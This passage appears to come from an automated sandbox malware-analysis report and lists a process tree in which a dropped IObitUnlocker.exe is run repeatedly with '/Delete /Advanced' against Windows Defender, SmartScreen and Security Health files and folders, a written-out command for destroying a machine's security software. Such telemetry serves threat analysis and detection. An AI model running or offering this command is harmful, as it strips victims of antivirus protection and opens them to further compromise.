                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2292
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5300
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:6112
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:3968
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2188
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:3400
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5756
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4392
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:900
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5168
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 